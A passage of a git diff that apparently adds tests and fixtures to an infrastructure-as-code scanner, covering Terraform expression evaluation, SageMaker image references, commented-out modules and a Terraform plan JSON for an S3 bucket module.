+                                       'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]',
+                                       'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[1]']
diff --git a/tests/terraform/graph/variable_rendering/test_string_evaluation.py b/tests/terraform/graph/variable_rendering/test_string_evaluation.py
index e10b4b41d4e..97a64f308c8 100644
--- a/tests/terraform/graph/variable_rendering/test_string_evaluation.py
+++ b/tests/terraform/graph/variable_rendering/test_string_evaluation.py
@@ -10,6 +10,11 @@
 
 
 class TestTerraformEvaluation(TestCase):
+    def test_zipmap(self):
+        input_str = '"zipmap(["a", "b"], [1, 2])"'
+        expected = {'a': 1, 'b': 2}
+        self.assertEqual(expected, evaluate_terraform(input_str))
+
     def test_directive(self):
         input_str = '"Hello, %{ if "d" != "" }named%{ else }unnamed%{ endif }!"'
         expected = 'Hello, named!'
@@ -24,6 +29,27 @@ def test_condition(self):
         expected = 'smaller'
         self.assertEqual(expected, evaluate_terraform(input_str).strip())
 
+    def test_conditional_expression(self):
+        input_str = '"[\'${blocked == "allowed" ? True : False}\']"'
+        expected = False
+        self.assertEqual(expected, evaluate_terraform(input_str))
+
+        input_str = '${blocked == "allowed" ? True : False}'
+        expected = False
+        self.assertEqual(expected, evaluate_terraform(input_str))
+
+        input_str = 'blocked == "allowed" ? True : False'
+        expected = False
+        self.assertEqual(expected, evaluate_terraform(input_str))
+        
+        input_str = 'True == "true" ? True : False'
+        expected = True
+        self.assertEqual(expected, evaluate_terraform(input_str))
+
+        input_str = 'False != "false" ? True : False'
+        expected = False
+        self.assertEqual(expected, evaluate_terraform(input_str))
+
     def test_format(self):
         input_str = '"format("Hello, %s!", "Ander")"'
         expected = 'Hello, Ander!'
@@ -479,6 +505,18 @@ def test_base64_value(self):
         expected = ["dGVzdA=="]
         self.assertEqual(expected, evaluate_terraform(input_str))
 
+    def test_try_block(self):
+        input_str = 'try("local.foo.boop", "{}")'
+        expected = {}
+        result = evaluate_terraform(input_str)
+        self.assertEqual(expected, result)
+
+    def test_try_then_merge_block(self):
+        input_str = "try((merge({}, {})), 1, 2)"
+        expected = {}
+        result = evaluate_terraform(input_str)
+        self.assertEqual(expected, result)
+
 
 @pytest.mark.parametrize(
     "origin_str,str_to_replace,new_value,expected",
diff --git a/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf b/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf
new file mode 100644
index 00000000000..f650086490e
--- /dev/null
+++ b/tests/terraform/image_referencer/resources/aws/sagemaker_image_version.tf
@@ -0,0 +1,4 @@
+resource "aws_sagemaker_image_version" "test" {
+  image_name = "name"
+  base_image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image:latest"
+}
\ No newline at end of file
diff --git a/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf b/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf
new file mode 100644
index 00000000000..02a1765b90f
--- /dev/null
+++ b/tests/terraform/image_referencer/resources/aws/sagemaker_model.tf
@@ -0,0 +1,17 @@
+resource "aws_sagemaker_model" "example1" {
+  name               = "my-model"
+  execution_role_arn = "arn:aws:iam::123456789012:role/SageMakerExecutionRole"
+
+  primary_container {
+    image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image1:latest"
+  }
+}
+
+resource "aws_sagemaker_model" "example2" {
+  name               = "my-model"
+  execution_role_arn = "arn:aws:iam::123456789012:role/SageMakerExecutionRole"
+
+  container {
+    image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image2:latest"
+  }
+}
diff --git a/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf b/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
index f2609fb3073..2bbbde5a054 100644
--- a/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
+++ b/tests/terraform/image_referencer/resources/gcp/cloudbuild.tf
@@ -35,7 +35,7 @@ resource "google_cloudbuild_trigger" "build-trigger" {
     secret {
       kms_key_name = "projects/myProject/locations/global/keyRings/keyring-name/cryptoKeys/key-name"
       secret_env = {
-        PASSWORD = "ZW5jcnlwdGVkLXBhc3N3b3JkCg=="  # checkov:skip=CKV_SECRET_6 test secret
+        PASSWORD = "ZW5jcnlwdGVkLXBhc3N3b3JkCg=="  # checkov:skip=CKV_SECRET_6 test secret  # checkov:skip=CKV_SECRET_80 test secret
       }
     }
     available_secrets {
diff --git a/tests/terraform/image_referencer/test_runner_aws_resources.py b/tests/terraform/image_referencer/test_runner_aws_resources.py
index 6507ea622bf..8c72803e15c 100644
--- a/tests/terraform/image_referencer/test_runner_aws_resources.py
+++ b/tests/terraform/image_referencer/test_runner_aws_resources.py
@@ -251,3 +251,88 @@ def test_lightsail_resources(mocker: MockerFixture, graph_framework):
     assert len(sca_image_report.failed_checks) == 3
     assert len(sca_image_report.skipped_checks) == 0
     assert len(sca_image_report.parsing_errors) == 0
+
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_image_version_resources(mocker: MockerFixture, graph_framework):
+    file_name = "sagemaker_image_version.tf"
+    base_image = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image:latest"
+    code_lines = "1-4"
+    test_file = RESOURCES_PATH / file_name
+    runner_filter = RunnerFilter(run_image_referencer=True)
+
+    mocker.patch(
+        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+        side_effect=mock_get_image_cached_result_async,
+    )
+    mocker.patch(
+        "checkov.common.images.image_referencer.get_license_statuses_async",
+        side_effect=mock_get_empty_license_statuses_async,
+    )
+
+    # when
+    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+        reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+    # then
+    assert len(reports) == 2
+    tf_report = next(report for report in reports if report.check_type == CheckType.TERRAFORM)
+    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+    assert len(tf_report.resources) == 1
+    assert len(tf_report.passed_checks) == 0
+    assert len(tf_report.failed_checks) == 0
+    assert len(tf_report.skipped_checks) == 0
+    assert len(tf_report.parsing_errors) == 0
+
+    assert len(sca_image_report.resources) == 1
+    assert sca_image_report.resources == {f"{file_name} ({base_image} lines:{code_lines} (sha256:2460522297)).go"}
+    assert len(sca_image_report.passed_checks) == 0
+    assert len(sca_image_report.failed_checks) == 3
+    assert len(sca_image_report.skipped_checks) == 0
+    assert len(sca_image_report.parsing_errors) == 0
+
+
+@pytest.mark.parametrize("graph_framework", GRAPH_FRAMEWORKS)
+def test_sagemaker_model_resources(mocker: MockerFixture, graph_framework):
+    file_name = "sagemaker_model.tf"
+    image_1 = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image1:latest"
+    image_2 = "012345678912.dkr.ecr.us-west-2.amazonaws.com/image2:latest"
+    code_lines_1 = "1-8"
+    code_lines_2 = "10-17"
+    test_file = RESOURCES_PATH / file_name
+    runner_filter = RunnerFilter(run_image_referencer=True)
+
+    mocker.patch(
+        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
+        side_effect=mock_get_image_cached_result_async,
+    )
+    mocker.patch(
+        "checkov.common.images.image_referencer.get_license_statuses_async",
+        side_effect=mock_get_empty_license_statuses_async,
+    )
+
+    # when
+    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
+        reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
+
+    # then
+    assert len(reports) == 2
+    tf_report = next(report for report in reports if report.check_type == CheckType.TERRAFORM)
+    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
+
+    assert len(tf_report.resources) == 2
+    assert len(tf_report.passed_checks) == 0
+    assert len(tf_report.failed_checks) == 2
+    assert len(tf_report.skipped_checks) == 0
+    assert len(tf_report.parsing_errors) == 0
+
+    assert len(sca_image_report.resources) == 2
+    assert sca_image_report.resources == {
+        f"{file_name} ({image_1} lines:{code_lines_1} (sha256:2460522297)).go",
+        f"{file_name} ({image_2} lines:{code_lines_2} (sha256:2460522297)).go",
+    }
+    assert len(sca_image_report.passed_checks) == 0
+    assert len(sca_image_report.failed_checks) == 6
+    assert len(sca_image_report.skipped_checks) == 0
+    assert len(sca_image_report.parsing_errors) == 0
\ No newline at end of file
diff --git a/tests/terraform/module_loading/data/tf_managed_modules/main.tf b/tests/terraform/module_loading/data/tf_managed_modules/main.tf
index 7f2f3164886..73eef8634f3 100644
--- a/tests/terraform/module_loading/data/tf_managed_modules/main.tf
+++ b/tests/terraform/module_loading/data/tf_managed_modules/main.tf
@@ -12,3 +12,22 @@ module "log_group_v4" {
   name_prefix       = "my-log-group-"
   retention_in_days = 7
 }
+
+#NOTE - THIS IS COMMENTED AS PART OF THE TEST TO CHECK HANDLING OF COMMENTED OUT MODULES. DO NOT DELETE
+# Need to verify this type of comment is not an issue.
+#module "log_group_pound_comment" {
+#  source  = "terraform-aws-modules/cloudwatch/aws//modules/log-group"
+#
+#  name_prefix       = "my-log-group-"
+#  retention_in_days = 7
+#}
+
+
+# Need to verify this type of comment is not an issue.
+/*
+module "log_group_star_comment" {
+  source  = "terraform-aws-modules/cloudwatch/aws//modules/log-group"
+  name_prefix       = "my-log-group-"
+  retention_in_days = 7
+}
+*/
\ No newline at end of file
diff --git a/tests/terraform/module_loading/test_tf_module_finder.py b/tests/terraform/module_loading/test_tf_module_finder.py
index 867fcc947c0..847ba62bbbd 100644
--- a/tests/terraform/module_loading/test_tf_module_finder.py
+++ b/tests/terraform/module_loading/test_tf_module_finder.py
@@ -52,7 +52,7 @@ def test_downloader(self):
 
 
 @mock.patch.dict(os.environ, {"CHECKOV_EXPERIMENTAL_TERRAFORM_MANAGED_MODULES": "True"})
-def test_tf_managed_modules():
+def test_tf_managed_and_comment_out_modules():
     # this test leverages the modules, which Terraform downloads on its own
 
     # given
diff --git a/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf b/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf
new file mode 100644
index 00000000000..52d924d3afd
--- /dev/null
+++ b/tests/terraform/parser/resources/plan_module_with_connected_resources/s3module.tf
@@ -0,0 +1,4 @@
+module "s3-bucket-1" {
+  source  = "terraform-aws-modules/s3-bucket/aws"
+  version = "4.0.1"
+}
diff --git a/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json b/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json
new file mode 100644
index 00000000000..304c9ef79cb
--- /dev/null
+++ b/tests/terraform/parser/resources/plan_module_with_connected_resources/tfplan.json
@@ -0,0 +1,2082 @@
+{
+    "format_version": "0.2",
+    "terraform_version": "1.0.7",
+    "planned_values": {
+        "root_module": {
+            "child_modules": [
+                {
+                    "resources": [
+                        {
+                            "address": "module.s3-bucket.aws_s3_bucket.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "force_destroy": false,
+                                "object_lock_enabled": false,
+                                "tags": null,
+                                "timeouts": null
+                            },
+                            "sensitive_values": {
+                                "cors_rule": [],
+                                "grant": [],
+                                "lifecycle_rule": [],
+                                "logging": [],
+                                "object_lock_configuration": [],
+                                "replication_configuration": [],
+                                "server_side_encryption_configuration": [],
+                                "tags_all": {},
+                                "versioning": [],
+                                "website": []
+                            }
+                        },
+                        {
+                            "address": "module.s3-bucket.aws_s3_bucket_public_access_block.this[0]",
+                            "mode": "managed",
+                            "type": "aws_s3_bucket_public_access_block",
+                            "name": "this",
+                            "index": 0,
+                            "provider_name": "registry.terraform.io/hashicorp/aws",
+                            "schema_version": 0,
+                            "values": {
+                                "block_public_acls": true,
+                                "block_public_policy": true,
+                                "ignore_public_acls": true,
+                                "restrict_public_buckets": true
+                            },
+                            "sensitive_values": {}
+                        }
+                    ],
+                    "address": "module.s3-bucket"
+                }
+            ]
+        }
+    },
+    "resource_changes": [
+        {
+            "address": "module.s3-bucket.aws_s3_bucket.this[0]",
+            "module_address": "module.s3-bucket",
+            "mode": "managed",
+            "type": "aws_s3_bucket",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "force_destroy": false,
+                    "object_lock_enabled": false,
+                    "tags": null,
+                    "timeouts": null
+                },
+                "after_unknown": {
+                    "acceleration_status": true,
+                    "acl": true,
+                    "arn": true,
+                    "bucket": true,
+                    "bucket_domain_name": true,
+                    "bucket_prefix": true,
+                    "bucket_regional_domain_name": true,
+                    "cors_rule": true,
+                    "grant": true,
+                    "hosted_zone_id": true,
+                    "id": true,
+                    "lifecycle_rule": true,
+                    "logging": true,
+                    "object_lock_configuration": true,
+                    "policy": true,
+                    "region": true,
+                    "replication_configuration": true,
+                    "request_payer": true,
+                    "server_side_encryption_configuration": true,
+                    "tags_all": true,
+                    "versioning": true,
+                    "website": true,
+                    "website_domain": true,
+                    "website_endpoint": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {
+                    "cors_rule": [],
+                    "grant": [],
+                    "lifecycle_rule": [],
+                    "logging": [],
+                    "object_lock_configuration": [],
+                    "replication_configuration": [],
+                    "server_side_encryption_configuration": [],
+                    "tags_all": {},
+                    "versioning": [],
+                    "website": []
+                }
+            }
+        },
+        {
+            "address": "module.s3-bucket.aws_s3_bucket_public_access_block.this[0]",
+            "module_address": "module.s3-bucket",
+            "mode": "managed",
+            "type": "aws_s3_bucket_public_access_block",
+            "name": "this",
+            "index": 0,
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "create"
+                ],
+                "before": null,
+                "after": {
+                    "block_public_acls": true,
+                    "block_public_policy": true,
+                    "ignore_public_acls": true,
+                    "restrict_public_buckets": true
+                },
+                "after_unknown": {
+                    "bucket": true,
+                    "id": true
+                },
+                "before_sensitive": false,
+                "after_sensitive": {}
+            }
+        }
+    ],
+    "prior_state": {
+        "format_version": "0.2",
+        "terraform_version": "1.0.7",
+        "values": {
+            "root_module": {
+                "child_modules": [
+                    {
+                        "resources": [
+                            {
+                                "address": "module.s3-bucket.data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "account_id": "101860328116",
+                                    "arn": "arn:aws:iam::101860328116:user/atlantis",
+                                    "id": "101860328116",
+                                    "user_id": "AIDARPN2ZIK2PHMJSNYXG"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket.data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "dns_suffix": "amazonaws.com",
+                                    "id": "aws",
+                                    "partition": "aws",
+                                    "reverse_dns_prefix": "com.amazonaws"
+                                },
+                                "sensitive_values": {}
+                            },
+                            {
+                                "address": "module.s3-bucket.data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_name": "registry.terraform.io/hashicorp/aws",
+                                "schema_version": 0,
+                                "values": {
+                                    "description": "Europe (Frankfurt)",
+                                    "endpoint": "ec2.eu-central-1.amazonaws.com",
+                                    "id": "eu-central-1",
+                                    "name": "eu-central-1"
+                                },
+                                "sensitive_values": {}
+                            }
+                        ],
+                        "address": "module.s3-bucket"
+                    }
+                ]
+            }
+        }
+    },
+    "configuration": {
+        "provider_config": {
+            "aws": {
+                "name": "aws",
+                "expressions": {
+                    "profile": {
+                        "constant_value": "razorpay-stage"
+                    },
+                    "region": {
+                        "constant_value": "eu-central-1"
+                    }
+                }
+            },
+            "module.s3-bucket:aws": {
+                "name": "aws",
+                "version_constraint": ">= 5.27.0",
+                "module_address": "module.s3-bucket"
+            }
+        },
+        "root_module": {
+            "module_calls": {
+                "s3-bucket": {
+                    "source": "terraform-aws-modules/s3-bucket/aws",
+                    "module": {
+                        "outputs": {
+                            "s3_bucket_arn": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].arn",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname."
+                            },
+                            "s3_bucket_bucket_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com."
+                            },
+                            "s3_bucket_bucket_regional_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_regional_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL."
+                            },
+                            "s3_bucket_hosted_zone_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].hosted_zone_id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The Route 53 Hosted Zone ID for this bucket's region."
+                            },
+                            "s3_bucket_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].id",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this",
+                                        "aws_s3_bucket.this[0].id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The name of the bucket."
+                            },
+                            "s3_bucket_lifecycle_configuration_rules": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_lifecycle_configuration.this[0].rule",
+                                        "aws_s3_bucket_lifecycle_configuration.this[0]",
+                                        "aws_s3_bucket_lifecycle_configuration.this"
+                                    ]
+                                },
+                                "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string."
+                            },
+                            "s3_bucket_policy": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].policy",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this"
+                                    ]
+                                },
+                                "description": "The policy of the bucket, if the bucket is configured with a policy. If not, this will be an empty string."
+                            },
+                            "s3_bucket_region": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].region",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The AWS region this bucket resides in."
+                            },
+                            "s3_bucket_website_domain": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_domain",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. This is used to create Route 53 alias records."
+                            },
+                            "s3_bucket_website_endpoint": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_endpoint",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string."
+                            }
+                        },
+                        "resources": [
+                            {
+                                "address": "aws_s3_bucket.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "var.bucket"
+                                        ]
+                                    },
+                                    "bucket_prefix": {
+                                        "references": [
+                                            "var.bucket_prefix"
+                                        ]
+                                    },
+                                    "force_destroy": {
+                                        "references": [
+                                            "var.force_destroy"
+                                        ]
+                                    },
+                                    "object_lock_enabled": {
+                                        "references": [
+                                            "var.object_lock_enabled"
+                                        ]
+                                    },
+                                    "tags": {
+                                        "references": [
+                                            "var.tags"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_accelerate_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_accelerate_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "var.acceleration_status"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.acceleration_status"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_acl.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_acl",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "acl": {
+                                        "references": [
+                                            "var.acl",
+                                            "var.acl"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_ownership_controls.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_analytics_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_analytics_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.analytics_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_cors_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_cors_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.cors_rules"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_intelligent_tiering_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_intelligent_tiering_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "each.value.status",
+                                            "each.value",
+                                            "each.value.status",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.intelligent_tiering",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_inventory.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_inventory",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "each.value.bucket",
+                                            "each.value",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "destination": [
+                                        {
+                                            "bucket": [
+                                                {
+                                                    "account_id": {
+                                                        "references": [
+                                                            "each.value.destination.account_id",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "bucket_arn": {
+                                                        "references": [
+                                                            "each.value.destination.bucket_arn",
+                                                            "each.value.destination",
+                                                            "each.value",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this"
+                                                        ]
+                                                    },
+                                                    "format": {
+                                                        "references": [
+                                                            "each.value.destination.format",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "prefix": {
+                                                        "references": [
+                                                            "each.value.destination.prefix",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "enabled": {
+                                        "references": [
+                                            "each.value.enabled",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "included_object_versions": {
+                                        "references": [
+                                            "each.value.included_object_versions",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "optional_fields": {
+                                        "references": [
+                                            "each.value.optional_fields",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "schedule": [
+                                        {
+                                            "frequency": {
+                                                "references": [
+                                                    "each.value.frequency",
+                                                    "each.value"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.inventory_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_lifecycle_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_lifecycle_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.lifecycle_rules"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_logging.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_logging",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "target_bucket": {
+                                        "references": [
+                                            "var.logging[\"target_bucket\"]",
+                                            "var.logging"
+                                        ]
+                                    },
+                                    "target_prefix": {
+                                        "references": [
+                                            "var.logging[\"target_prefix\"]",
+                                            "var.logging"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.logging"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_metric.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_metric",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.value.name",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.metric_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_object_lock_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_object_lock_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "default_retention": [
+                                                {
+                                                    "days": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.days",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "mode": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.mode",
